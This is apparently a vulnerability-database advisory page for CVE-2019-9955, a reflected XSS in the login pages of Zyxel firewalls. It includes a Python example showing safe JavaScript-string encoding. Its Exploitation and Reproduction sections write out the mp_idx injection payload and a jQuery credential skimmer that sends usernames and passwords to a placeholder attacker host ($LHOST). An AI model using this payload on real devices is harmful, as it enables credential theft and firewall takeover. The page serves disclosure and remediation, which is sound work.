VYPR
Unrated severity. NVD Advisory · Published Apr 22, 2019 · Updated Aug 4, 2024

CVE-2019-9955

Description

Reflected XSS in Zyxel firewall login pages via unsanitized mp_idx parameter allows credential theft.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability

A reflected Cross-Site Scripting (XSS) vulnerability exists in the login pages of multiple Zyxel devices, including ATP200, ATP500, ATP800, USG20-VPN, USG20W-VPN, USG40, USG40W, USG60, USG60W, USG110, USG210, USG310, USG1100, USG1900, USG2200-VPN, ZyWALL 110, ZyWALL 310, and ZyWALL 1100 [1][2]. The flaw lies in the weblogin.cgi and webauth_relogin.cgi scripts [1]. The mp_idx parameter is included unsanitized in the response, allowing arbitrary JavaScript injection. The vulnerable firmware version is V4.31 [1]. No authentication is required to reach the affected pages [2].

Exploitation

An attacker can exploit this by crafting a malicious URL containing a payload in the `mp_idx` parameter, for example `GET /?mobile=1&mp_idx=%22;$.getScript(%27//$LHOST/z%27);//` [1]. The attacker hosts a malicious JavaScript file (e.g., named `z`) on an attacker-controlled server. This script captures login credentials (username and password) when a victim clicks the login button and exfiltrates them to the attacker [1]. The attacker needs to trick a user into visiting the crafted link; no prior authentication is required [2].

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of the victim's browser session on the Zyxel device login page [1]. The primary impact is the potential theft of administrator credentials, leading to full compromise of the firewall's administrative interface. This can result in unauthorized access to the network, configuration changes, and further internal attacks. The attack does not require any privileges and is performed remotely [1][2].

Mitigation

Zyxel released firmware patches to address CVE-2019-9955. Fixed firmware versions include 433ABFU0ITS-WK12-r87753 for ATP500, 433AALA0ITS-WK12-r87753 for USG40, 433AAPL0ITS-WK12-r87753 for USG1900, 433AAAC0ITS-WK12-r87753 for ZyWALL1100, and 433AAAB0ITS-WK12-r87753 for ZyWALL310 [2]. Users should apply the appropriate firmware update for their device from the vendor's FTP site. As a workaround, avoid clicking on untrusted links and ensure the login page uses HTTPS. No workaround involving configuration changes is publicly available.

AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 3

Patches: 0 (no patches discovered yet)

Vulnerability mechanics

Root cause

"Missing input sanitization of the 'mp_idx' parameter allows reflected cross-site scripting (XSS) in the login page JavaScript context."

Attack vector

An attacker crafts a URL containing the `mp_idx` parameter with a payload that closes the existing JavaScript string and injects a jQuery `$.getScript()` call to load a malicious external script [ref_id=1]. When a victim visits this crafted URL on the device's login page, the unsanitized `mp_idx` value is reflected into the page's inline JavaScript, causing the browser to execute the attacker's script [ref_id=1]. The injected script can then capture the victim's login credentials when the form is submitted and exfiltrate them to an attacker-controlled host [ref_id=1].

Affected code

The vulnerability exists in the `weblogin.cgi` and `webauth_relogin.cgi` endpoints on Zyxel devices running firmware version V4.31 [ref_id=1]. The `mp_idx` parameter is reflected into a JavaScript variable assignment without sanitization, as shown in the response where the attacker's payload appears directly in `var mp_idx = "";$.getScript('//$LHOST/z');//";` [ref_id=1].

What the fix does

The advisory does not include a patch diff or vendor fix details [ref_id=1]. The remediation guidance implied by the disclosure is that the `mp_idx` parameter must be properly sanitized or encoded before being reflected into the JavaScript context of the login page response [ref_id=1]. Without such sanitization, an attacker can break out of the existing JavaScript string assignment and inject arbitrary script code.
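To make the fix concrete, the following added example (not Zyxel's code; the login-page template is a constructed stand-in, since the real CGI source is not public) renders the `var mp_idx = "...";` assignment both the vulnerable way and with proper JavaScript-string-literal encoding, and includes a check that scans the rendered line with the JS string-literal rules to confirm the value cannot leave the literal:

```python
import json
import re
from urllib.parse import unquote

# The mp_idx value from the advisory's request, URL-decoded. The login page
# template below is a constructed stand-in; the real CGI source is not public.
PAYLOAD = unquote("%22;$.getScript(%27//$LHOST/z%27);//")
PREFIX = 'var mp_idx = "'

def render_unsafe(mp_idx):
    """Vulnerable pattern: the raw parameter is pasted between the quotes."""
    return PREFIX + mp_idx + '";'

def js_string_literal(value):
    """Encode an untrusted value as a JavaScript string literal.

    json.dumps yields a double-quoted literal with quotes, backslashes, control
    characters and (with the default ensure_ascii) every non-ASCII character,
    including the U+2028/U+2029 line terminators, backslash-escaped. '<', '>'
    and '&' are additionally \\u-escaped so the value can never close the
    inline <script> block or open an HTML comment.
    """
    lit = json.dumps(value)
    return re.sub(r"[<>&]", lambda m: "\\u%04x" % ord(m.group()), lit)

def render_safe(mp_idx):
    """Hardened pattern: the encoder supplies the quotes, not the template."""
    return "var mp_idx = " + js_string_literal(mp_idx) + ";"

def literal_is_whole(rendered):
    """Check a rendered assignment with the JS string-literal rules: the value
    must stay inside one literal that is followed only by ';', and the line
    must not contain a closing script tag."""
    if not rendered.startswith(PREFIX) or "</script" in rendered.lower():
        return False
    i = len(PREFIX)
    while i < len(rendered):
        c = rendered[i]
        if c == "\\":
            i += 2            # escaped character, skip it
        elif c == '"':
            return rendered[i + 1:] == ";"
        elif c in "\n\r\u2028\u2029":
            return False      # unterminated literal
        else:
            i += 1
    return False

if __name__ == "__main__":
    print(render_unsafe(PAYLOAD), literal_is_whole(render_unsafe(PAYLOAD)))
    print(render_safe(PAYLOAD), literal_is_whole(render_safe(PAYLOAD)))
```

The unsafe rendering reproduces the response line quoted above; the safe rendering keeps the same payload inert inside the literal.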

Preconditions

  • network: The victim must be able to reach the Zyxel device's login page (weblogin.cgi or webauth_relogin.cgi) over the network
  • input: The attacker must host a malicious JavaScript file on an attacker-controlled server reachable by the victim's browser
  • input: The victim must click or be redirected to a crafted URL containing the malicious mp_idx parameter

Reproduction

1. Host a JavaScript file named `z` (or any single character) on an attacker-controlled server (`$LHOST`). The file contains: `$("button").click(function() { $.get("//$LHOST", { username: $("input:text").val(), password: $("input:password").val(), host: location.hostname}); });` [ref_id=1].
2. Send the victim a crafted GET request to the target Zyxel device: `GET /?mobile=1&mp_idx=%22;$.getScript(%27//$LHOST/z%27);// HTTP/1.1` with `Host: $RHOST` [ref_id=1].
3. When the victim loads this URL, the `mp_idx` value is reflected unsanitized into the page's JavaScript, causing the browser to fetch and execute the attacker's script [ref_id=1].
4. When the victim submits the login form, the attacker's server receives the credentials via a GET request containing `username`, `password`, and `host` parameters [ref_id=1].

Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References: 5

News mentions: 0 (no linked articles in our index yet)